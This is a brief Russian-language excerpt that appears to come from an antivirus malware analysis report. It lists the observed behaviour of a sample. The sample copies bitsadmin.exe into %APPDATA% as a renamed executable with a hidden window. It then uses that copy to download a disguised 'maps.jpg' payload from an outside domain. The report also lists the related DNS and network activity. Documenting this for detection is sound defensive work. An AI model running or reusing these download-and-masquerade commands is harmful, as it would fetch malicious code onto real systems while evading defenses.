Техническая информация
- '%APPDATA%\genluk.exe' /transfer QcUECq /download https://vicend.com/viena/11320720011/maps.jpg %APPDATA%\maps.jpg
- %APPDATA%\genluk.exe
- 'vi##nd.com':443
- DNS ASK vi##nd.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\genlUK.exe' (со скрытым окном)
- '%APPDATA%\genluk.exe' /transfer QcUECq /download https://vicend.com/viena/11320720011/maps.jpg %APPDATA%\maps.jpg' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\genlUK.exe